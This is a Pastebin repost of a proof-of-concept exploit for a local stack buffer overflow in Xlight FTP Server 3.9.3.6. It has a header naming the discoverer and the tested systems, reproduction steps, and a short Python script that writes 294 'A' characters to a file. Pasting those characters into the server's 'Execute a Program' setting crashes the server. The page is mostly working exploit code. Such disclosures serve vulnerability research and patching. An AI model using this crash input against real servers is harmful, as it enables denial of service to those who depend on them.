Advertisement
FlyFar

Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)

Jan 21st, 2024
1,133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.00 KB | Cybersecurity | 0 0
  1. # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
  2. # Discovered by: Yehia Elghaly
  3. # Discovered Date: 2023-08-04
  4. # Vendor Homepage: https://www.xlightftpd.com/
  5. # Software Link : https://www.xlightftpd.com/download/setup.exe
  6. # Tested Version: 3.9.3.6
  7. # Vulnerability Type: Buffer Overflow Local
  8. # Tested on OS: Windows XP Professional SP3 - Windows 11 x64
  9.  
  10. # Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
  11.  
  12. # Steps to reproduce:
  13. # 1. - Download and Xlight FTP Server
  14. # 2. - Run the python script and it will create exploit.txt file.
  15. # 3. - Open Xlight FTP Server 3.9.3.6
  16. # 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup
  17. # 6. - Execute a Program after use logged in-  Paste the characters
  18. # 7  - Crashed
  19.  
  20. #!/usr/bin/env python3
  21.  
  22. exploit = 'A' * 294
  23.  
  24. try:
  25.     with open("exploit.txt","w") as file:
  26.         file.write(exploit)
  27.     print("POC is created")
  28. except:
  29.     print("POC not created")
  30.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement